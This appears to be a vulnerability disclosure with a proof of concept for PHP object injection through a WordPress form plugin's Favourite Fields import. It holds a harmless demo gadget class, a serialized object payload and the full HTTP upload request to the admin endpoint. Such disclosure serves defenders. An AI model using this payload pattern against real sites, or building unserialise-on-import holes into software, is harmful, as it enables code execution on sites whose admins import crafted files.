The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then import a file with the following content via Import / Export > Favourite Fields (/wp-admin/admin.php?page=nf-import-export&tab=favorite_fields): O:4:"Evil":0:{};
POST /wp-admin/admin.php?page=nf-import-export&tab=favorite_fields HTTP/1.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKFuobGrwagXg1r1n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin+
Connection: close
------WebKitFormBoundaryKFuobGrwagXg1r1n
Content-Disposition: form-data; name="nf_import_fields"; filename="test"
Content-Type: application/octet-stream
O:4:"Evil":0:{};
------WebKitFormBoundaryKFuobGrwagXg1r1n
Content-Disposition: form-data; name="nf_import_security"
252edff6dd
------WebKitFormBoundaryKFuobGrwagXg1r1n--